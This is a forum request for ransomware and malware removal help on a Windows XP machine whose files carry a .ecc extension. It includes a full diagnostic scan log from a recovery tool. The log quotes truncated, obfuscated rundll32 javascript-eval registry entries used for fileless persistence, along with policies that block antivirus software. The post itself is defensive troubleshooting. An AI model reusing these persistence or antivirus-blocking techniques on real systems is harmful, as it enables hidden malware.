Encrypted files (.ecc), malware removal help needed


  • This topic is locked
3 replies to this topic

#1 sportsfroma2


Posted 14 March 2015 - 12:24 PM

Hello!
 
My friend has a Windows XP Computer that has been infected with malware.
 
Brought it over to me as he didn't know where to go (not too technical or patient).
 
It looks like all his documents now have the .ecc extension, last modify date on these files is 2/24/15.
 
Looks like he was running MSE, which is disabled now, and part of his own troubleshooting steps involved installing AVG to try to remove it... Looking through the AVG logs, the threat it identified was:
Trojan Horse MSIL7.WDF .
 
I also see Malwarebytes on his computer, and when I try running it from the Administrator account (which is the only account I have logged into so far, there is another account or two) I get the following error:
"Windows cannot open this program because it has been prevented by a software restriction policy."
 
I have not connected his computer to a network yet as I don't want to make things worse if possible, although if you think it would help I can certainly do so. I do have other computers available (am typing from my own computer right now).
 
I ran FRST off a flash drive, and have included the information as requested.
 
Thank you for all your help and for taking the time to look at this!
 
 
frst.tx:
Scan result of Farbar Recovery Scan Tool (FRST) (x86) Version: 11-03-2015
Ran by Administrator (administrator) on NICK on 14-03-2015 13:06:51
Running from F:\
Loaded Profiles: michelle coe & Administrator (Available profiles: michelle coe & Administrator)
Platform: Microsoft Windows XP Professional Service Pack 3 (X86) OS Language: English (United States)
Internet Explorer Version 8 (Default browser: FF)
Boot Mode: Normal
Tutorial for Farbar Recovery Scan Tool: http://www.geekstogo.com/forum/topic/335081-frst-tutorial-how-to-use-farbar-recovery-scan-tool/

==================== Processes (Whitelisted) =================

(If an entry is included in the fixlist, the process will be closed. The file will not be moved.)

(AVG Technologies CZ, s.r.o.) C:\PROGRA~1\AVG\AVG2015\avgrsx.exe
(AVG Technologies CZ, s.r.o.) C:\Program Files\AVG\AVG2015\avgcsrvx.exe
(AVG Technologies CZ, s.r.o.) C:\Program Files\AVG\AVG2015\avgidsagent.exe
(AVG Technologies CZ, s.r.o.) C:\Program Files\AVG\AVG2015\avgwdsvc.exe
(CrypKey (Canada) Ltd.) C:\WINDOWS\system32\Crypserv.exe
(Logitech Inc.) C:\Program Files\Common Files\LogiShrd\LVCOMSER\LVComSer.exe
(Logitech Inc.) C:\Program Files\Common Files\LogiShrd\LVMVFM\LVPrcSrv.exe
(NVIDIA Corporation) C:\WINDOWS\system32\nvsvc32.exe
() C:\WINDOWS\system32\PnkBstrA.exe
(AVG Technologies CZ, s.r.o.) C:\Program Files\AVG\AVG2015\avgnsx.exe
(AVG Technologies CZ, s.r.o.) C:\Program Files\AVG\AVG2015\avgemcx.exe
(Realtek Semiconductor Corp.) C:\WINDOWS\RTHDCPL.EXE
(Microsoft Corporation) C:\WINDOWS\system32\rundll32.exe
(Microsoft Corporation) C:\Program Files\Microsoft Office\Office12\GrooveMonitor.exe
(ScanSoft, Inc.) C:\Program Files\ScanSoft\PaperPort\pptd40nt.exe
() C:\Program Files\Common Files\LogiShrd\LComMgr\Communications_Helper.exe
(Brother Industries, Ltd.) C:\Program Files\Brother\ControlCenter2\brctrcen.exe
(Synaptics, Inc.) C:\Program Files\Synaptics\SynTP\SynTPEnh.exe
(AVG Technologies CZ, s.r.o.) C:\Program Files\AVG\AVG2015\avgui.exe
() C:\Documents and Settings\Administrator\Local Settings\Application Data\Viber\Viber.exe
(Microsoft Corporation) C:\Program Files\Microsoft Office\Office12\ONENOTEM.EXE
(Audiovox Electronics Corp.) C:\Documents and Settings\Administrator\My Documents\RCA Detective\RCADetective.exe
(Microsoft Corporation) C:\WINDOWS\system32\dllhost.exe
(Microsoft Corporation) C:\WINDOWS\system32\wuauclt.exe


==================== Registry (Whitelisted) ==================

(If an entry is included in the fixlist, the registry item will be restored to default or removed. The file will not be moved.)

HKLM\...\Run: [RTHDCPL] => C:\WINDOWS\RTHDCPL.EXE [17881600 2009-08-09] (Realtek Semiconductor Corp.)
HKLM\...\Run: [NvCplDaemon] => RUNDLL32.EXE C:\WINDOWS\system32\NvCpl.dll,NvStartup
HKLM\...\Run: [nwiz] => nwiz.exe /install
HKLM\...\Run: [NvMediaCenter] => RUNDLL32.EXE C:\WINDOWS\system32\NvMcTray.dll,NvTaskbarInit
HKLM\...\Run: [GrooveMonitor] => C:\Program Files\Microsoft Office\Office12\GrooveMonitor.exe [30040 2009-02-26] (Microsoft Corporation)
HKLM\...\Run: [SSBkgdUpdate] => C:\Program Files\Common Files\Scansoft Shared\SSBkgdUpdate\SSBkgdupdate.exe [155648 2003-10-14] (Scansoft, Inc.)
HKLM\...\Run: [PaperPort PTD] => C:\Program Files\ScanSoft\PaperPort\pptd40nt.exe [57393 2004-04-14] (ScanSoft, Inc.)
HKLM\...\Run: [IndexSearch] => C:\Program Files\ScanSoft\PaperPort\IndexSearch.exe [40960 2004-04-14] (ScanSoft, Inc.)
HKLM\...\Run: [LogitechCommunicationsManager] => C:\Program Files\Common Files\LogiShrd\LComMgr\Communications_Helper.exe [564496 2008-09-22] ()
HKLM\...\Run: [SetDefPrt] => C:\Program Files\Brother\Brmfl04g\BrStDvPt.exe [49152 2004-11-11] (Brother Industories, Ltd.)
HKLM\...\Run: [ControlCenter2.0] => C:\Program Files\Brother\ControlCenter2\brctrcen.exe [864256 2005-01-07] (Brother Industries, Ltd.)
HKLM\...\Run: [SynTPLpr] => C:\Program Files\Synaptics\SynTP\SynTPLpr.exe [98394 2008-12-03] (Synaptics, Inc.)
HKLM\...\Run: [SynTPEnh] => C:\Program Files\Synaptics\SynTP\SynTPEnh.exe [688218 2008-12-03] (Synaptics, Inc.)
HKLM\...\Run: [Adobe ARM] => C:\Program Files\Common Files\Adobe\ARM\1.0\AdobeARM.exe [1022152 2014-12-19] (Adobe Systems Incorporated)
HKLM\...\Run: [MSC] => c:\Program Files\Microsoft Security Client\msseces.exe [948440 2013-10-23] (Microsoft Corporation)
HKLM\...\Run: [KernelFaultCheck] => %systemroot%\system32\dumprep 0 -k
HKLM\...\Run: [AVG_UI] => C:\Program Files\AVG\AVG2015\avgui.exe [3710416 2015-02-19] (AVG Technologies CZ, s.r.o.)
HKLM Group Policy restriction on software: C:\Program Files\Microsoft Security Client <====== ATTENTION
HKLM Group Policy restriction on software: C:\Program Files\SUPERAntiSpyware <====== ATTENTION
HKLM Group Policy restriction on software: C:\Documents and Settings\All Users\Application Data\Malwarebytes <====== ATTENTION
HKLM Group Policy restriction on software: C:\Documents and Settings\All Users\Application Data\McAfee <====== ATTENTION
HKLM Group Policy restriction on software: C:\Documents and Settings\All Users\Application Data\Microsoft\Microsoft Antimalware <====== ATTENTION
HKLM Group Policy restriction on software: C:\Program Files\Malwarebytes' Anti-Malware <====== ATTENTION
HKLM\...99B7938DA9E4}\LocalServer32: [Default-wmiprvse] rundll32.exe javascript:"ijpyf8\..\mshtml,RunHTMLApplication ";eval(")odv!@buhwdYNckdbu)#VRbshqu/Rid (the data entry has 362 more characters). <==== ATTENTION!
HKLM\...99B7938DA9E4}\LocalServer32: [a] rundll32.exe javascript:"ijpyf8\..\mshtml,RunHTMLApplication ";eval(")odv!@buhwdYNckdbu)#VRbshqu/Rid (the data entry has 28512 more characters). <==== ATTENTION!
HKU\S-1-5-19\...\Policies\Explorer: [NoSMMyPictures] 1
HKU\S-1-5-20\...\Policies\Explorer: [NoSMMyPictures] 1
HKU\S-1-5-21-484763869-1604221776-1801674531-1004\...\Run: [Skype] => C:\Program Files\Skype\Phone\Skype.exe [31090272 2015-01-23] (Skype Technologies S.A.)
HKU\S-1-5-21-484763869-1604221776-1801674531-1004\...\Policies\Explorer: [NoSMMyPictures] 1
HKU\S-1-5-21-484763869-1604221776-1801674531-500\...\Run: [Steam] => E:\Program Files\Valve\Steam\steam.exe [2874048 2015-02-18] (Valve Corporation)
HKU\S-1-5-21-484763869-1604221776-1801674531-500\...\Run: [PCPerformer] => "C:\Program Files\PC Performer\PCPerformer.exe" /RUNSCAN
HKU\S-1-5-21-484763869-1604221776-1801674531-500\...\Run: [Viber] => C:\Documents and Settings\Administrator\Local Settings\Application Data\Viber\Viber.exe [936656 2014-10-20] ()
HKU\S-1-5-21-484763869-1604221776-1801674531-500\Control Panel\Desktop\\SCRNSAVE.EXE -> C:\WINDOWS\system32\sspipes.scr [610304 2008-04-14] (Microsoft Corporation)
HKU\S-1-5-18\...\Run: [DWQueuedReporting] => C:\Program Files\Common Files\Microsoft Shared\DW\DWTRIG20.EXE [434080 2011-07-27] (Microsoft Corporation)
HKU\S-1-5-18\...\RunOnce: [_nltide_3] => rundll32 advpack.dll,LaunchINFSectionEx nLite.inf,C,,4,N
HKU\S-1-5-18\...\Policies\Explorer: [NoSMMyPictures] 1
Startup: C:\Documents and Settings\Administrator\Start Menu\Programs\Startup\OneNote 2007 Screen Clipper and Launcher.lnk
ShortcutTarget: OneNote 2007 Screen Clipper and Launcher.lnk -> C:\Program Files\Microsoft Office\Office12\ONENOTEM.EXE (Microsoft Corporation)
Startup: C:\Documents and Settings\Administrator\Start Menu\Programs\Startup\RCA Detective.lnk
ShortcutTarget: RCA Detective.lnk -> C:\Documents and Settings\Administrator\My Documents\RCA Detective\RCADetective.exe (Audiovox Electronics Corp.)
Startup: C:\Documents and Settings\michelle coe\Start Menu\Programs\Startup\OneNote 2007 Screen Clipper and Launcher.lnk
ShortcutTarget: OneNote 2007 Screen Clipper and Launcher.lnk -> C:\Program Files\Microsoft Office\Office12\ONENOTEM.EXE (Microsoft Corporation)
ShellIconOverlayIdentifiers: [AutoCAD Digital Signatures Icon Overlay Handler] -> {36A21736-36C2-4C11-8ACB-D4136F2B57BD} => C:\WINDOWS\system32\AcSignIcon.dll (Autodesk, Inc.)
BootExecute: autocheck autochk * C:\PROGRA~1\AVG\AVG2015\avgrsx.exe /sync /restart

==================== Internet (Whitelisted) ====================

(If an item is included in the fixlist, if it is a registry item it will be removed or restored to default.)

HKLM\SOFTWARE\Policies\Microsoft\Internet Explorer: Policy restriction <======= ATTENTION
HKU\.DEFAULT\SOFTWARE\Policies\Microsoft\Internet Explorer: Policy restriction <======= ATTENTION
HKU\S-1-5-21-484763869-1604221776-1801674531-500\SOFTWARE\Policies\Microsoft\Internet Explorer: Policy restriction <======= ATTENTION
HKU\.DEFAULT\Software\Microsoft\Internet Explorer\Main,Start Page = http://www.microsoft.com/isapi/redir.dll?prd=ie&ar=msnhome
HKU\.DEFAULT\Software\Microsoft\Internet Explorer\Main,Search Page = http://www.microsoft.com/isapi/redir.dll?prd=ie&ar=iesearch
HKU\S-1-5-19\Software\Microsoft\Internet Explorer\Main,Start Page = http://www.msn.com/?pc=MSERT1
HKU\S-1-5-19\Software\Microsoft\Internet Explorer\Main,First Home Page = http://go.microsoft.com/fwlink/?LinkID=226786&Mkt=en-US&Src=MSERT&Tid=800325EB&OHP=http%3A%2F%2Fwww.google.com&OSP=
HKU\S-1-5-20\Software\Microsoft\Internet Explorer\Main,Start Page = http://www.msn.com/?pc=MSERT1
HKU\S-1-5-20\Software\Microsoft\Internet Explorer\Main,First Home Page = http://go.microsoft.com/fwlink/?LinkID=226786&Mkt=en-US&Src=MSERT&Tid=800325EB&OHP=http%3A%2F%2Fwww.google.com&OSP=
HKU\S-1-5-21-484763869-1604221776-1801674531-1004\Software\Microsoft\Internet Explorer\Main,Start Page = http://www.msn.com/?pc=MSERT1
HKU\S-1-5-21-484763869-1604221776-1801674531-500\Software\Microsoft\Internet Explorer\Main,Search Page = http://www.microsoft.com/isapi/redir.dll?prd=ie&ar=iesearch
HKU\S-1-5-21-484763869-1604221776-1801674531-500\Software\Microsoft\Internet Explorer\Main,Start Page = http://www.msn.com/?pc=MSERT1
HKU\S-1-5-21-484763869-1604221776-1801674531-500\Software\Microsoft\Internet Explorer\Main,First Home Page = http://go.microsoft.com/fwlink/?LinkID=226786&Mkt=en-US&Src=MSERT&Tid=800325EB&OHP=http%3A%2F%2Fwww.trovi.com%2F%3Fgd%3D%26ctid%3DCT3324416%26octid%3DEB_ORIGINAL_CTID%26ISID%3DM6E8017B3-0759-46E8-B817-861E7524FED6%26SearchSource%3D55%26CUI%3D%26UM%3D6%26UP%3DSP0E5D5DD2-4641-40D0-AE17-07D6A8146A08%26SSPV%3D&OSP=http%3A%2F%2Fwww.trovi.com%2FResults.aspx%3Fgd%3D%26ctid%3DCT3324416%26octid%3DEB_ORIGINAL_CTID%26ISID%3DM6E8017B3-0759-46E8-B817-861E7524FED6%26SearchSource%3D58%26CUI%3D%26UM%3D6%26UP%3DSP0E5D5DD2-4641-40D0-AE17-07D6A8146A08%26q%3D{searchTerms}%26SSPV%3D
URLSearchHook: HKU\S-1-5-21-484763869-1604221776-1801674531-1004 - YTNavAssistPlugin Class - {81017EA9-9AA8-4A6A-9734-7AF40E7D593F} - C:\Program Files\Yahoo!\Companion\Installs\cpn6\yt.dll (Yahoo! Inc.)
SearchScopes: HKLM -> DefaultScope {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL = http://www.bing.com/search
SearchScopes: HKLM -> {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL = http://www.bing.com/search
SearchScopes: HKU\S-1-5-21-484763869-1604221776-1801674531-1004 -> DefaultScope {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL = http://www.bing.com/search
SearchScopes: HKU\S-1-5-21-484763869-1604221776-1801674531-1004 -> {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL = http://www.bing.com/search
SearchScopes: HKU\S-1-5-21-484763869-1604221776-1801674531-1004 -> {7F54C3DA-FBDF-4CAD-8D92-C33C95D5A8F3} URL = http://search.yahoo.com/search?p={searchTerms}&ei=utf-8&fr=b2ie7
SearchScopes: HKU\S-1-5-21-484763869-1604221776-1801674531-1004 -> {AFDBDDAA-5D3F-42EE-B79C-185A7020515B} URL =
SearchScopes: HKU\S-1-5-21-484763869-1604221776-1801674531-500 -> DefaultScope {014DB5FA-EAFB-4592-A95B-F44D3EE87FA9} URL = http://www.bing.com/search?q={searchTerms}&form=MSERBM&pc=MSERT1
SearchScopes: HKU\S-1-5-21-484763869-1604221776-1801674531-500 -> {014DB5FA-EAFB-4592-A95B-F44D3EE87FA9} URL = http://www.bing.com/search?q={searchTerms}&form=MSERBM&pc=MSERT1
SearchScopes: HKU\S-1-5-21-484763869-1604221776-1801674531-500 -> {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL = http://www.bing.com/search
SearchScopes: HKU\S-1-5-21-484763869-1604221776-1801674531-500 -> {6246045F-68F7-4336-B903-93F466D2AB35} URL = http://search.yahoo.com/search?p={searchTerms}&ei=utf-8&fr=b2ie7
BHO: Speed Test -> {319A461D-5202-4578-9EDC-CA35B9C0B561} -> C:\Program Files\Speed Test\ScriptHost.dll [2014-09-07] (BestOffers)
BHO: Groove GFS Browser Helper -> {72853161-30C5-4D22-B7F9-0BBC1D38A37E} -> C:\Program Files\Microsoft Office\Office12\GrooveShellExtensions.dll [2009-02-26] (Microsoft Corporation)
BHO: No Name -> {761497BB-D6F0-462C-B6EB-D4DAF1D92D43} ->  No File
BHO: No Name -> {DBC80044-A445-435b-BC74-9C25C1C588A9} ->  No File
BHO: SingleInstance Class -> {FDAD4DA1-61A2-4FD8-9C17-86F7AC245081} -> C:\Program Files\Yahoo!\Companion\Installs\cpn1\YTSingleInstance.dll [2010-03-23] (Yahoo! Inc)
DPF: {166B1BCA-3F9C-11CF-8075-444553540000} http://download.macromedia.com/pub/shockwave/cabs/director/sw.cab
DPF: {6E32070A-766D-4EE6-879C-DC1FA91D2FC3} http://update.microsoft.com/microsoftupdate/v6/V5Controls/en/x86/client/muweb_site.cab?1249879274671
DPF: {7530BFB8-7293-4D34-9923-61A11451AFC5} http://download.eset.com/special/eos/OnlineScanner.cab
DPF: {E2883E8F-472F-4FB0-9522-AC9BF37916A7} http://platformdl.adobe.com/NOS/getPlusPlus/1.6/gp.cab
Handler: grooveLocalGWS - {88FED34C-F0CA-4636-A375-3CB6248B04CD} - C:\Program Files\Microsoft Office\Office12\GrooveSystemServices.dll [2009-02-26] (Microsoft Corporation)

FireFox:
========
FF ProfilePath: C:\Documents and Settings\Administrator\Application Data\Mozilla\Firefox\Profiles\xpnfs4wb.default-1392871144062
FF Plugin: @adobe.com/FlashPlayer -> C:\WINDOWS\system32\Macromed\Flash\NPSWF32_16_0_0_305.dll [2015-02-22] ()
FF Plugin: @adobe.com/ShockwavePlayer -> C:\WINDOWS\system32\Adobe\Director\np32dsw.dll [2009-07-31] (Adobe Systems, Inc.)
FF Plugin: @Google.com/GoogleEarthPlugin -> C:\Program Files\Google\Google Earth\plugin\npgeplugin.dll [2013-10-07] (Google)
FF Plugin: @java.com/DTPlugin,version=1.6.0_37 -> C:\WINDOWS\system32\npdeployJava1.dll No File
FF Plugin: @Microsoft.com/NpCtrl,version=1.0 -> c:\Program Files\Microsoft Silverlight\5.1.30514.0\npctrl.dll [2014-05-13] ( Microsoft Corporation)
FF Plugin: @microsoft.com/WPF,version=3.5 -> c:\WINDOWS\Microsoft.NET\Framework\v3.5\Windows Presentation Foundation\NPWPF.dll [2008-07-29] (Microsoft Corporation)
FF Plugin: @tools.google.com/Google Update;version=3 -> C:\Program Files\Google\Update\1.3.26.9\npGoogleUpdate3.dll [2015-02-04] (Google Inc.)
FF Plugin: @tools.google.com/Google Update;version=9 -> C:\Program Files\Google\Update\1.3.26.9\npGoogleUpdate3.dll [2015-02-04] (Google Inc.)
FF Plugin: @videolan.org/vlc,version=1.0.1 -> C:\Program Files\VideoLAN\VLC\npvlc.dll [2009-07-26] (the VideoLAN Team)
FF Plugin: Adobe Reader -> C:\Program Files\Adobe\Reader 11.0\Reader\AIR\nppdf32.dll [2014-08-05] (Adobe Systems Inc.)
FF Plugin ProgramFiles/Appdata: C:\Program Files\mozilla firefox\plugins\npFoxitReaderPlugin.dll [2009-08-10] (Foxit Software Company)
FF Plugin ProgramFiles/Appdata: C:\Program Files\mozilla firefox\plugins\NPOFF12.DLL [2006-10-26] (Microsoft Corporation)
FF Plugin ProgramFiles/Appdata: C:\Program Files\mozilla firefox\plugins\nppdf32.dll [2014-08-05] (Adobe Systems Inc.)
FF Plugin ProgramFiles/Appdata: C:\Program Files\mozilla firefox\plugins\np_gp.dll [2010-03-29] (NOS Microsystems Ltd.)
FF SearchPlugin: C:\Documents and Settings\Administrator\Application Data\Mozilla\Firefox\Profiles\xpnfs4wb.default-1392871144062\searchplugins\trovi-search.xml [2014-11-15]
FF HKLM\...\Firefox\Extensions: [{20a82645-c095-46ed-80e3-08825760534b}] - c:\WINDOWS\Microsoft.NET\Framework\v3.5\Windows Presentation Foundation\DotNetAssistantExtension
FF Extension: Microsoft .NET Framework Assistant - c:\WINDOWS\Microsoft.NET\Framework\v3.5\Windows Presentation Foundation\DotNetAssistantExtension [2009-08-09]

Chrome:
=======
CHR HomePage: Default -> www.salineschools.org
CHR StartupUrls: Default -> "hxxp://www.trovi.com/?gd=&ctid=CT3324416&octid=EB_ORIGINAL_CTID&ISID=M6E8017B3-0759-46E8-B817-861E7524FED6&SearchSource=55&CUI=&UM=6&UP=SP0E5D5DD2-4641-40D0-AE17-07D6A8146A08&SSPV="
CHR DefaultSuggestURL: Default -> {google:baseSuggestURL}search?{google:searchFieldtrialParameter}client={google:suggestClient}&gs_ri={google:suggestRid}&xssi=t&q={searchTerms}&{google:inputType}{google:cursorPosition}{google:currentPageUrl}{google:pageClassification}{google:searchVersion}{google:sessionToken}{google:prefetchQuery}sugkey={google:suggestAPIKeyParameter}
CHR Profile: C:\Documents and Settings\Administrator\Local Settings\Application Data\Google\Chrome\User Data\Default
CHR Extension: (No Name) - C:\Documents and Settings\Administrator\Local Settings\Application Data\Google\Chrome\User Data\Default\Extensions\agoenciogemlojlhccbcpcfflicgnaak [2014-09-28]
CHR Extension: (No Name) - C:\Documents and Settings\Administrator\Local Settings\Application Data\Google\Chrome\User Data\Default\Extensions\aohghmighlieiainnegkcijnfilokake [2014-04-21]
CHR Extension: (No Name) - C:\Documents and Settings\Administrator\Local Settings\Application Data\Google\Chrome\User Data\Default\Extensions\apdfllckaahabafndbhieahigkjlhalf [2014-04-21]
CHR Extension: (No Name) - C:\Documents and Settings\Administrator\Local Settings\Application Data\Google\Chrome\User Data\Default\Extensions\bepbmhgboaologfdajaanbcjmnhjmhfn [2014-06-02]
CHR Extension: (No Name) - C:\Documents and Settings\Administrator\Local Settings\Application Data\Google\Chrome\User Data\Default\Extensions\blpcfgokakmgnkcojhhkbfbldkacnbeo [2012-07-01]
CHR Extension: (No Name) - C:\Documents and Settings\Administrator\Local Settings\Application Data\Google\Chrome\User Data\Default\Extensions\coobgpohoikkiipiblmjeljniedjpjpf [2012-07-01]
CHR Extension: (No Name) - C:\Documents and Settings\Administrator\Local Settings\Application Data\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda [2013-09-21]
CHR Extension: (No Name) - C:\Documents and Settings\Administrator\Local Settings\Application Data\Google\Chrome\User Data\Default\Extensions\pjkljhegncpnkpknbcohdijeoejaedia [2012-07-01]
CHR HKLM\...\Chrome\Extension: [dnhmdikhcjjeafcdfchklpfpaoamdjjd] - C:\Documents and Settings\Administrator\Local Settings\Application Data\CRE\dnhmdikhcjjeafcdfchklpfpaoamdjjd.crx [Not Found]
CHR HKU\S-1-5-21-484763869-1604221776-1801674531-500\SOFTWARE\Google\Chrome\Extensions\...\Chrome\Extension: [dnhmdikhcjjeafcdfchklpfpaoamdjjd] - C:\Documents and Settings\Administrator\Local Settings\Application Data\CRE\dnhmdikhcjjeafcdfchklpfpaoamdjjd.crx [Not Found]

========================== Services (Whitelisted) =================

(If an entry is included in the fixlist, the service will be removed from the registry. The file will not be moved unless listed separately.)

R2 AVGIDSAgent; C:\Program Files\AVG\AVG2015\avgidsagent.exe [3411408 2015-02-19] (AVG Technologies CZ, s.r.o.)
R2 avgwd; C:\Program Files\AVG\AVG2015\avgwdsvc.exe [308720 2015-02-19] (AVG Technologies CZ, s.r.o.)
R2 Crypkey License; C:\WINDOWS\system32\crypserv.exe [122880 2008-05-07] (CrypKey (Canada) Ltd.) [File not signed]
S3 getPlusHelper; C:\Program Files\NOS\bin\getPlus_Helper.dll [68000 2010-03-29] (NOS Microsystems Ltd.)
R2 LVCOMSer; C:\Program Files\Common Files\LogiShrd\LVCOMSER\LVComSer.exe [186904 2008-09-22] (Logitech Inc.)
S2 MsMpSvc; c:\Program Files\Microsoft Security Client\MsMpEng.exe [22208 2013-10-23] (Microsoft Corporation)
R2 PnkBstrA; C:\WINDOWS\system32\PnkBstrA.exe [66872 2009-12-28] ()
S2 x10nets; C:\Program Files\Common Files\X10\Common\X10nets.exe [20480 2001-11-12] (X10) [File not signed]

==================== Drivers (Whitelisted) ====================

(If an entry is included in the fixlist, the service will be removed from the registry. The file will not be moved unless listed separately.)

R1 A2DDA; C:\EEK\RUN\a2ddax86.sys [22056 2014-03-07] (Emsisoft GmbH)
S3 Ambfilt; C:\WINDOWS\System32\drivers\Ambfilt.sys [1684736 2009-08-09] (Creative)
R1 Avgdiskx; C:\WINDOWS\System32\DRIVERS\avgdiskx.sys [121624 2014-06-18] (AVG Technologies CZ, s.r.o.)
R1 AVGIDSDriverl; C:\WINDOWS\System32\DRIVERS\avgidsdriverlx.sys [202208 2015-02-19] (AVG Technologies CZ, s.r.o.)
R0 AVGIDSHX; C:\WINDOWS\System32\DRIVERS\avgidshx.sys [154904 2014-11-18] (AVG Technologies CZ, s.r.o.)
R1 AVGIDSShim; C:\WINDOWS\System32\DRIVERS\avgidsshimx.sys [21272 2014-06-18] (AVG Technologies CZ, s.r.o.)
R1 Avgldx86; C:\WINDOWS\System32\DRIVERS\avgldx86.sys [192792 2014-08-28] (AVG Technologies CZ, s.r.o.)
R0 Avglogx; C:\WINDOWS\System32\DRIVERS\avglogx.sys [265184 2015-02-03] (AVG Technologies CZ, s.r.o.)
R0 Avgmfx86; C:\WINDOWS\System32\DRIVERS\avgmfx86.sys [107488 2015-01-23] (AVG Technologies CZ, s.r.o.)
R0 Avgrkx86; C:\WINDOWS\System32\DRIVERS\avgrkx86.sys [27416 2014-06-18] (AVG Technologies CZ, s.r.o.)
R1 Avgtdix; C:\WINDOWS\System32\DRIVERS\avgtdix.sys [210400 2015-01-16] (AVG Technologies CZ, s.r.o.)
S3 BrScnUsb; C:\WINDOWS\System32\Drivers\BrScnUsb.sys [15295 2004-10-15] (Brother Industries Ltd.)
S3 CCDECODE; C:\WINDOWS\System32\DRIVERS\CCDECODE.sys [17024 2008-04-14] (Microsoft Corporation)
S3 cleanhlp; C:\EEK\Run\cleanhlp32.sys [50200 2014-03-07] (Emsisoft GmbH)
S3 FilterService; C:\WINDOWS\System32\DRIVERS\lvuvcflt.sys [23832 2008-05-20] (Logitech Inc.)
S3 gfiark; C:\WINDOWS\System32\drivers\gfiark.sys [43368 2013-05-23] (ThreatTrack Security)
S3 gfiutil; C:\WINDOWS\System32\drivers\gfiutil.sys [24040 2013-09-04] (ThreatTrack Security)
R3 LVPr2Mon; C:\WINDOWS\System32\DRIVERS\LVPr2Mon.sys [25624 2008-09-22] ()
S3 LVUSBSta; C:\WINDOWS\System32\drivers\LVUSBSta.sys [41752 2008-05-20] (Logitech Inc.)
S3 Monfilt; C:\WINDOWS\System32\drivers\Monfilt.sys [1389056 2009-08-09] (Creative Technology Ltd.)
R0 MpFilter; C:\WINDOWS\System32\DRIVERS\MpFilter.sys [214696 2013-09-27] (Microsoft Corporation)
S3 NdisIP; C:\WINDOWS\System32\DRIVERS\NdisIP.sys [10880 2008-04-14] (Microsoft Corporation)
R1 NetworkX; C:\WINDOWS\system32\ckldrv.sys [19584 2008-03-17] () [File not signed]
S3 SCT_SKMScan; C:\WINDOWS\System32\drivers\sct_skmscan.sys [33096 2012-10-12] (Sophos Limited)
S3 usbbus; C:\WINDOWS\System32\DRIVERS\lgusbbus.sys [12416 2007-07-23] (LG Electronics Inc.)
S3 UsbDiag; C:\WINDOWS\System32\DRIVERS\lgusbdiag.sys [19840 2007-07-23] (LG Electronics Inc.)
S3 USBModem; C:\WINDOWS\System32\DRIVERS\lgusbmodem.sys [21632 2007-07-23] (LG Electronics Inc.)
S3 XUIF; C:\WINDOWS\System32\Drivers\x10ufx2.sys [17792 2005-05-19] (X10 Wireless Technology, Inc.)
S3 catchme; \??\C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\catchme.sys [X]
S1 exgjfwiw; \??\C:\WINDOWS\system32\drivers\exgjfwiw.sys [X]
S3 rt2870; system32\DRIVERS\rt2870.sys [X]
S1 SABKUTIL; \??\C:\Program Files\SUPERAntiSpyware\SABKUTIL.sys [X]
U3 TrueSight; \??\C:\WINDOWS\system32\TrueSight.sys [X]

==================== NetSvcs (Whitelisted) ===================

(If an item is included in the fixlist, it will be removed from the registry. Any associated file could be listed separately to be moved.)


==================== One Month Created Files and Folders ========

(If an entry is included in the fixlist, the file\folder will be moved.)

2015-03-14 13:06 - 2015-03-14 13:06 - 00000000 ____D () C:\FRST
2015-03-07 18:57 - 2015-03-07 18:58 - 00000000 ____D () C:\Program Files\Mozilla Firefox
2015-03-02 19:01 - 2015-03-02 19:01 - 00000000 ____D () C:\Documents and Settings\michelle coe\Local Settings\Application Data\Avg2015
2015-03-02 19:01 - 2015-03-02 19:01 - 00000000 ____D () C:\Documents and Settings\michelle coe\Application Data\AVG2015
2015-03-02 18:52 - 2015-03-02 18:53 - 00000000 ____D () C:\Documents and Settings\Administrator\Application Data\SmartDraw
2015-03-02 15:54 - 2015-03-02 15:54 - 00000221 _____ () C:\Documents and Settings\Administrator\Desktop\Call of Duty Modern Warfare 2.url
2015-03-02 15:54 - 2015-03-02 15:54 - 00000221 _____ () C:\Documents and Settings\Administrator\Desktop\Call of Duty Modern Warfare 2 - Multiplayer.url
2015-03-01 14:46 - 2015-03-01 14:46 - 00000000 ____D () C:\Documents and Settings\Administrator\Application Data\AVG2015
2015-03-01 14:44 - 2015-03-01 14:44 - 00000702 _____ () C:\Documents and Settings\All Users\Desktop\AVG 2015.lnk
2015-03-01 14:44 - 2015-03-01 14:44 - 00000000 ____D () C:\Documents and Settings\All Users\Start Menu\Programs\AVG
2015-03-01 14:44 - 2015-03-01 14:44 - 00000000 ____D () C:\Documents and Settings\Administrator\Application Data\TuneUp Software
2015-03-01 14:43 - 2015-03-01 14:45 - 00000000 ____D () C:\Documents and Settings\All Users\Application Data\AVG2015
2015-03-01 14:43 - 2015-03-01 14:43 - 00000000 ___HD () C:\$AVG
2015-03-01 14:41 - 2015-03-01 14:41 - 00000000 ____D () C:\Program Files\AVG
2015-03-01 14:30 - 2015-03-01 15:15 - 00000000 ____D () C:\Documents and Settings\Administrator\Local Settings\Application Data\Avg2015
2015-03-01 14:30 - 2015-03-01 14:30 - 00000000 ____D () C:\Documents and Settings\Administrator\Local Settings\Application Data\MFAData
2015-03-01 12:59 - 2015-03-01 12:59 - 00000105 _____ () C:\Documents and Settings\Administrator\Application Data\mbam.context.scan
2015-02-25 21:10 - 2015-03-01 19:47 - 00073505 _____ () C:\WINDOWS\iis6.log
2015-02-25 21:10 - 2015-03-01 19:47 - 00038178 _____ () C:\WINDOWS\FaxSetup.log
2015-02-25 21:10 - 2015-03-01 19:47 - 00035419 _____ () C:\WINDOWS\ocgen.log
2015-02-25 21:10 - 2015-03-01 19:47 - 00026504 _____ () C:\WINDOWS\tsoc.log
2015-02-25 21:10 - 2015-03-01 19:47 - 00016726 _____ () C:\WINDOWS\msmqinst.log
2015-02-25 21:10 - 2015-03-01 19:47 - 00014361 _____ () C:\WINDOWS\comsetup.log
2015-02-25 21:10 - 2015-03-01 19:47 - 00011004 _____ () C:\WINDOWS\ntdtcsetup.log
2015-02-25 21:10 - 2015-03-01 19:47 - 00008529 _____ () C:\WINDOWS\netfxocm.log
2015-02-25 21:10 - 2015-03-01 19:47 - 00004083 _____ () C:\WINDOWS\MedCtrOC.log
